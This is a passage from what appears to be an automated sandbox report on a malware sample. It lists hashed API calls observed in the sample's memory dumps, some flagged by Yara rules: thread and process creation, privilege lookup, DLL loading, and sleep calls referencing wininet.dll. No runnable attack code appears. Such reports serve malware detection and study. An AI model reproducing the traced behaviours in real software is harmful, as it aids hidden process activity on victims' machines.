                                                                      • Opcode Fuzzy Hash: 825c1b1b4482d13002c081d9be0221e92f8c008e92c479d63903677dd0f1b39b
                                                                      • Instruction Fuzzy Hash: 149002B130140402F54071598805F46000997E0345F51D055E50D5558E8699DDD576A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8350f1821e30e4a268d14c7f3f960a2e2988e9d8ffb9678b025eb9c17839d342
                                                                      • Instruction ID: f1ef4fe2ffcff221820989adbc3bb08315b8d30672d930b477167c51edfd15c5
                                                                      • Opcode Fuzzy Hash: 8350f1821e30e4a268d14c7f3f960a2e2988e9d8ffb9678b025eb9c17839d342
                                                                      • Instruction Fuzzy Hash: D890027130148802F5107159C805F4A000997E0345F55D455E449565CD86D5D8917161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b35c55cbc6b5b06ff508bde1973284d67f7628cf0132d8b0860dfc56fa67af1
                                                                      • Instruction ID: 0ff233b68a387361862f540d62b43edf7cf57bcea1ded21d518104418a457bf2
                                                                      • Opcode Fuzzy Hash: 7b35c55cbc6b5b06ff508bde1973284d67f7628cf0132d8b0860dfc56fa67af1
                                                                      • Instruction Fuzzy Hash: EC90027130140842F50071598805F46000997F0345F51D05AE0195658D8655D8517561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 78c3e49b09e680a504d3a55702d03328f408afca278465da835d1080c92eb2f5
                                                                      • Instruction ID: 71c70294e36f0823428e156395f1843032abd201431b949ac92de766e435b28f
                                                                      • Opcode Fuzzy Hash: 78c3e49b09e680a504d3a55702d03328f408afca278465da835d1080c92eb2f5
                                                                      • Instruction Fuzzy Hash: C190027130140802F58071598805E4A000997E1345F91D059E0096658DCA55DA5977E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0625b22a792ce908a7f5935bc1b27e4d344adc2cad71b11d333d65ca727757bb
                                                                      • Instruction ID: d2388b3c2f4115d911f29a55e288d73015f09914d6ed3ed1b4489e99d71b9f7f
                                                                      • Opcode Fuzzy Hash: 0625b22a792ce908a7f5935bc1b27e4d344adc2cad71b11d333d65ca727757bb
                                                                      • Instruction Fuzzy Hash: C090027130544842F54071598805E46001997E0349F51D055E00D5698D9665DD55B6A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9bb86ba75d87b5df5056f6ae8e6404c94c44a02f8a5c57efcf1141bfab8b47b9
                                                                      • Instruction ID: 5d72ead0424fc9522cc0e2c7b0568870658d4e46f473337637dc5fb9c9379f02
                                                                      • Opcode Fuzzy Hash: 9bb86ba75d87b5df5056f6ae8e6404c94c44a02f8a5c57efcf1141bfab8b47b9
                                                                      • Instruction Fuzzy Hash: C5900261311C0042F60075698C15F07000997E0347F51D159E01C5558CC955D8616561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c983073a30318351f62832e527aced64adb9bdbf68dc3e356c677ba6e504e938
                                                                      • Instruction ID: 5c720eedc65232d70fd0c339ac3b22fdb597dec3cfe46fef9a04d4db0a02a24c
                                                                      • Opcode Fuzzy Hash: c983073a30318351f62832e527aced64adb9bdbf68dc3e356c677ba6e504e938
                                                                      • Instruction Fuzzy Hash: 2390027131154402F5107159C805F06000997E1245F51D455E089555CD86D5D8917162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ede400cef66cbf18608552188b2cef4dc8052ea647bb51e67c6b97a4dfb6a1b9
                                                                      • Instruction ID: ef9eca53cfcb8ed2b3727f20c48ade3fa43cfb49cc7a71b4ed606f4b8df2187e
                                                                      • Opcode Fuzzy Hash: ede400cef66cbf18608552188b2cef4dc8052ea647bb51e67c6b97a4dfb6a1b9
                                                                      • Instruction Fuzzy Hash: 5F90026931340002F58071599809E0A000997E1246F91E459E008655CCC955D8696361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6fdbf9fac53eb6748023974cfee7ba836a3efbf6356486cbaee0536042af8c57
                                                                      • Instruction ID: 9de9fb351b6ec763bde8d2d67fb065adab53ed3e715f0d8782d08a61f753e531
                                                                      • Opcode Fuzzy Hash: 6fdbf9fac53eb6748023974cfee7ba836a3efbf6356486cbaee0536042af8c57
                                                                      • Instruction Fuzzy Hash: C590027130140402F50075999809E46000997F0345F51E055E5095559EC6A5D8917171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02FA7398
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 631f0422649455a868019048222af52ef06eed790df8fbfa480d018ff2aae31c
                                                                      • Instruction ID: f27e7ec743e905336d1c6947e4a8c8a651b9e574d731f1d2121d3b00dc62a73b
                                                                      • Opcode Fuzzy Hash: 631f0422649455a868019048222af52ef06eed790df8fbfa480d018ff2aae31c
                                                                      • Instruction Fuzzy Hash: F031AFB6641700ABD711EF64CCB0FABF7B9AF48740F00811DFA1A9B240D730A406CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02FA7398
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 000e337293a65d970dff8b8b4fe54d2ff63699e15d999ea2303cafb84d9fd05d
                                                                      • Instruction ID: 0dabe7c4eb2b61f4f2194fbe56efacdda8b83e0de265d218c61b6a17315dd9cb
                                                                      • Opcode Fuzzy Hash: 000e337293a65d970dff8b8b4fe54d2ff63699e15d999ea2303cafb84d9fd05d
                                                                      • Instruction Fuzzy Hash: EE21C1B2A41305ABD710EF68C8B1F9BF7B9AF48740F008019FA199B241D374A406CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F93B93), ref: 02FA890D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: e8a9e08993360a29194d38e37f4fdccffc9ab7c1dfa94b045a2b68023fa60a02
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: 0DE046B1200208ABDB18EF99CC48EA777ADEF88750F018558FE085B241C670F910CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F93B93), ref: 02FA890D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: cc51ab8958503c4e594928e5a26a561a3fb1e3ef5bebc1910c7db322919628af
                                                                      • Instruction ID: e8d60bc0b9fdab1f59b17cf43d08c363a993c091645db05a5b081dcd3a94bb0b
                                                                      • Opcode Fuzzy Hash: cc51ab8958503c4e594928e5a26a561a3fb1e3ef5bebc1910c7db322919628af
                                                                      • Instruction Fuzzy Hash: BBE01AB12002046BDB28DF65CC89EEB7B69AF88350F114558FD4997241C671E914CAA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F972DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F972FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                      • Instruction ID: 1156f61946f389ff649e98675a68a1750b8bae6e788036619e72b7a6b5dbd54c
                                                                      • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                      • Instruction Fuzzy Hash: 66018471A9032976FB21AA948C42FBEB76C5B00B91F150158FF04BA1C0EAD469058AF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F972DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F972FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 09ba10c5a797ff58a7b525f8ac7da8246eb5be2cb773690cbab8e562b21df97a
                                                                      • Instruction ID: a720894f5834e6a97d8075b1df24645611752289fe4fa8a10471205501e0351d
                                                                      • Opcode Fuzzy Hash: 09ba10c5a797ff58a7b525f8ac7da8246eb5be2cb773690cbab8e562b21df97a
                                                                      • Instruction Fuzzy Hash: E3F0E9B1AA032536FA2125951C42FBFA35C5B41F90F264019FF04F91C1E6D965010AF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F99BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                      • Instruction ID: b43369cc27afe3140057a049f8ebcff1f4edade0c066ab54137c863c0e8c37ca
                                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                      • Instruction Fuzzy Hash: A3011EB6D4020DABDF10DBE4DC41F9DB3B99B54348F1081A5EA0997241F675EB18CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FA89A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction ID: c45a8ddf0edd459b45b3c8c77b761f6c8dc5cedd5ec3ab4c9cba615ed2e764e8
                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction Fuzzy Hash: B601B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02FA89A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: c9331e74c06739909adc464d22be5437a9ddeb8c690f5bed0b55d0b4fd376162
                                                                      • Instruction ID: 25c211ffb661f6fd6b0a7ef02e8290b5b51765b50be3e87157f62e7082644b75
                                                                      • Opcode Fuzzy Hash: c9331e74c06739909adc464d22be5437a9ddeb8c690f5bed0b55d0b4fd376162
                                                                      • Instruction Fuzzy Hash: 2701F2B6208148AFCB04CF98DC90DEB3BA9AF8C310F158258FA5997201C630E841CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F9CCE0,?,?), ref: 02FA745C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 3ca44593fb86b1f80511b06f8a713e59ae1df70daee7da666a180111cd889d13
                                                                      • Instruction ID: df0e8f238b350333ade4f2f0774ae261c77c56ef6ecfa7e42e022fb0453b2006
                                                                      • Opcode Fuzzy Hash: 3ca44593fb86b1f80511b06f8a713e59ae1df70daee7da666a180111cd889d13
                                                                      • Instruction Fuzzy Hash: 19E092B37803043AE3306599AC02FA7B39DDB81B64F550026FB0DEB2C0D595F80146A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F9CCE0,?,?), ref: 02FA745C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 0aa7f466be8b781a2f8db9d9dff033d81bfacaecaf9172f88b494faf1cd0fce3
                                                                      • Instruction ID: f02d0e87e234503dbb74ac3b0712f29bfe6e0e2515b829c50ccbced92840d322
                                                                      • Opcode Fuzzy Hash: 0aa7f466be8b781a2f8db9d9dff033d81bfacaecaf9172f88b494faf1cd0fce3
                                                                      • Instruction Fuzzy Hash: 96F0E5B27803003ED7302668DC52FE7B7698B91B10F650529F74AEB6C1DA95B80147A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F9CFB2,02F9CFB2,?,00000000,?,?), ref: 02FA8A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 1b2e71dfd368c30363699cc9a65747ef6514d23da0cf59a9686a74c7ed6562dd
                                                                      • Instruction ID: 3109eadd14ef88a18c4eb74df1669386f60993fa20d78cd2b87661854d27d6a5
                                                                      • Opcode Fuzzy Hash: 1b2e71dfd368c30363699cc9a65747ef6514d23da0cf59a9686a74c7ed6562dd
                                                                      • Instruction Fuzzy Hash: 00E06DB52002046BDB14EF99CC85EDB37A99F89264F058694FE196B291C934E850CBF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F9CFB2,02F9CFB2,?,00000000,?,?), ref: 02FA8A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 07777a6cfb786fd6342f29c6a2731c63f731ba05413acc3d958a28136d85675b
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 4EE01AB12002086BDB14DF49CC84EE737ADAF88650F018164BE0857241C970E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02FA3526,?,02FA3C9F,02FA3C9F,?,02FA3526,?,?,?,?,?,00000000,00000000,?), ref: 02FA88CD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction ID: fb1721506c2bb5672466fc47272166a88cf27f1196b5a8d74047a2ee1a3727d7
                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction Fuzzy Hash: 95E046B1200208ABDB18EF99CC44EA777ADEF88750F118558FE085B241C670F910CBF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F97C83,?), ref: 02F9D44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Offset: 02F90000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                      • Instruction ID: 82c1875db2a3e722c4f9ab77e4bdcfa101d3ff7d32a9a243eb4cc641d4509888
                                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                      • Instruction Fuzzy Hash: D4D0A7717503043BFA10FBA89C03F2672CD5B85B44F494074FA48D73C3DA54F4004561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f07c897eb064c82884fb169b99893ba4b25d95c104f7d94321aba0863fd63d54
                                                                      • Instruction ID: 91e52b8c6fae6cf7645cf7c96e3dc25133579d2f9937cc9128a11bc03febfbdd
                                                                      • Opcode Fuzzy Hash: f07c897eb064c82884fb169b99893ba4b25d95c104f7d94321aba0863fd63d54
                                                                      • Instruction Fuzzy Hash: E5B09BB19014C5C5FB11E7A04A09F1779047BE0755F16D555D1060645B477CD091F5B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      			E04ECFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E04E7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E04EC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E04EC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}










                                                                      0x04ecfdda
                                                                      0x04ecfde2
                                                                      0x04ecfde5
                                                                      0x04ecfdec
                                                                      0x04ecfdfa
                                                                      0x04ecfdff
                                                                      0x04ecfe0a
                                                                      0x04ecfe0f
                                                                      0x04ecfe17
                                                                      0x04ecfe1e
                                                                      0x04ecfe19
                                                                      0x04ecfe19
                                                                      0x04ecfe19
                                                                      0x04ecfe20
                                                                      0x04ecfe21
                                                                      0x04ecfe22
                                                                      0x04ecfe25
                                                                      0x04ecfe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ECFDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ECFE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ECFE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.921495996.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: true
                                                                      • Associated: 00000011.00000002.921731521.0000000004F2B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 6b79061facd671d4945dba148753d3880b64e6e1346d96521aaf1318c9286f72
                                                                      • Instruction ID: 381c59d46fade505b66016b45c85e8acca70768bea433f22bdf0c6768f0b648f
                                                                      • Opcode Fuzzy Hash: 6b79061facd671d4945dba148753d3880b64e6e1346d96521aaf1318c9286f72
                                                                      • Instruction Fuzzy Hash: 15F0F632240211BFE6241B45DD06F63BB5AEB44730F245358F628561E1EAA2F86197F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%